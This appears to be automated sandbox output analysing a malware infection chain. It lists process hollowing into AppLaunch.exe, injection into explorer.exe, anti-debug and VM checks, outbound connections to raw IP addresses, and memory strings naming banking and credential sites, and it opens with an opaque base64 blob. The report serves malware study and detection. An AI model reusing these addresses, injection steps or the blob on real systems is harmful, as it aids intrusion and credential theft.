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
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 501B.exe, 00000011.00000003.3732491826.0000000003AC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAK7h1VmCi65Obi5jNTRteVQcxmCUm10opeTD7+Q1UVttM/Hv6XudG/RA
                      Source: explorer.exe, 00000002.00000000.2196495464.0000000009605000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 501B.exe, 00000011.00000003.3907488337.0000000003AC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MIGJAoGBAKZKuJzV8ZX+cjLj4pS5kCOpDnhqEMu9pStjmoyoAgEAaM0J4FeJUTox
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: explorer.exe, 00000002.00000000.2192808205.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: explorer.exe, 00000002.00000000.2199499200.000000000C474000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: explorer.exe, 00000002.00000000.2192808205.0000000000D99000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007D24000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: AppLaunch.exe, 0000000B.00000002.2637832149.0000000007F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006AB2BD FindFirstFileExW,10_2_006AB2BD
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006AB7A1 FindFirstFileExW,FindNextFileW,FindClose,FindClose,10_2_006AB7A1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00890D90 mov eax, dword ptr fs:[00000030h]0_2_00890D90
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089092B mov eax, dword ptr fs:[00000030h]0_2_0089092B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0091E295 push dword ptr fs:[00000030h]0_2_0091E295
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_007FD715 push dword ptr fs:[00000030h]6_2_007FD715
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_0230092B mov eax, dword ptr fs:[00000030h]6_2_0230092B
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: 6_2_02300D90 mov eax, dword ptr fs:[00000030h]6_2_02300D90
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00628D60 mov edi, dword ptr fs:[00000030h]10_2_00628D60
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A2815 mov eax, dword ptr fs:[00000030h]10_2_006A2815
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00698353 mov ecx, dword ptr fs:[00000030h]10_2_00698353
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00628630 mov edi, dword ptr fs:[00000030h]10_2_00628630
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00628D60 mov edi, dword ptr fs:[00000030h]10_2_00628D60
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A260B mov eax, dword ptr fs:[00000030h]10_2_006A260B
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A26B1 mov eax, dword ptr fs:[00000030h]10_2_006A26B1
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A2722 mov eax, dword ptr fs:[00000030h]10_2_006A2722
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A286A mov eax, dword ptr fs:[00000030h]10_2_006A286A
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A28FC mov eax, dword ptr fs:[00000030h]10_2_006A28FC
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006A28BF mov eax, dword ptr fs:[00000030h]10_2_006A28BF
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006118C5 mov edi, dword ptr fs:[00000030h]10_2_006118C5
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_00960D90 mov eax, dword ptr fs:[00000030h]12_2_00960D90
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_0096092B mov eax, dword ptr fs:[00000030h]12_2_0096092B
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: 12_2_009BE3AA push dword ptr fs:[00000030h]12_2_009BE3AA
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006644B5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_006644B5
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004029BA LdrLoadDll,0_2_004029BA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006644B5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_006644B5
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_006533C9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_006533C9
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00653786 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00653786

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeNetwork Connect: 34.143.166.163 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 104.198.2.251 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 34.94.245.237 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 211.119.84.112 80Jump to behavior
                      Source: C:\Windows\explorer.exeNetwork Connect: 186.182.55.44 80Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 91.215.85.17 80
                      Source: C:\Windows\explorer.exeFile created: 501B.exe.2.drJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeMemory written: C:\Users\user\AppData\Local\Temp\501B.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Drivers\csrss.exeMemory written: C:\ProgramData\Drivers\csrss.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: 10_2_00623A30 CreateProcessW,VirtualAllocEx,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,10_2_00623A30
                      Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 79F1AD0Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiThread created: unknown EIP: 8651AD0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6942.exeThread created: unknown EIP: 2D71A40
                      Source: C:\Users\user\AppData\Roaming\wjdvfwiThread created: unknown EIP: 2DF1A40
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 6679C0Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 402000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 422000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 42C000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 879008Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 5996 base: 6679C0 value: 90Jump to behavior
                      Source: C:\Windows\explorer.exeMemory written: PID: 3132 base: 7FF6091E2D10 value: 90Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\501B.exeProcess created: C:\Users\user\AppData\Local\Temp\501B.exe C:\Users\user\AppData\Local\Temp\501B.exeJump to behavior
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: explorer.exe, 00000002.00000000.2193118191.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                      Source: explorer.exe, 00000002.00000000.2193118191.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2194187192.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000002.00000000.2193118191.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000002.00000000.2192808205.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
                      Source: explorer.exe, 00000002.00000000.2193118191.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000002.00000000.2196926681.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
                      Source: C:\Users\user\Desktop\file.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_00410C63
                      Source: C:\Users\user\Desktop\file.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,0_2_004118BF
                      Source: C:\Users\user\Desktop\file.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,__calloc_crt,0_2_0040FB14
                      Source: C:\Users\user\Desktop\file.exeCode function: __crtGetLocaleInfoA_stat,0_2_00416395
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_00410C63
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,6_2_004118BF
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,__calloc_crt,6_2_0040FB14
                      Source: C:\Users\user\AppData\Roaming\fjdvfwiCode function: __crtGetLocaleInfoA_stat,6_2_00416395
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,10_2_006B046D
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: EnumSystemLocalesW,10_2_006B07B6
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: EnumSystemLocalesW,10_2_006B0838
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: EnumSystemLocalesW,10_2_006B08F9
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_006B09A6
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoW,10_2_006B0C8D
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_006B0E00
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoW,10_2_006B0F47
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_006B1049
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: EnumSystemLocalesW,10_2_006A118F
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: EnumSystemLocalesW,10_2_006A137E
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoEx,FormatMessageA,10_2_0062D731
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoEx,10_2_00651C14
                      Source: C:\Users\user\AppData\Local\Temp\4888.exeCode function: GetLocaleInfoW,10_2_006A1ED9
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,12_2_0040EA6F
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,12_2_0040DE13
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: __crtGetLocaleInfoA_stat,12_2_00412D74
                      Source: C:\Users\user\AppData\Local\Temp\4AFA.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,12_2_0040C98F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
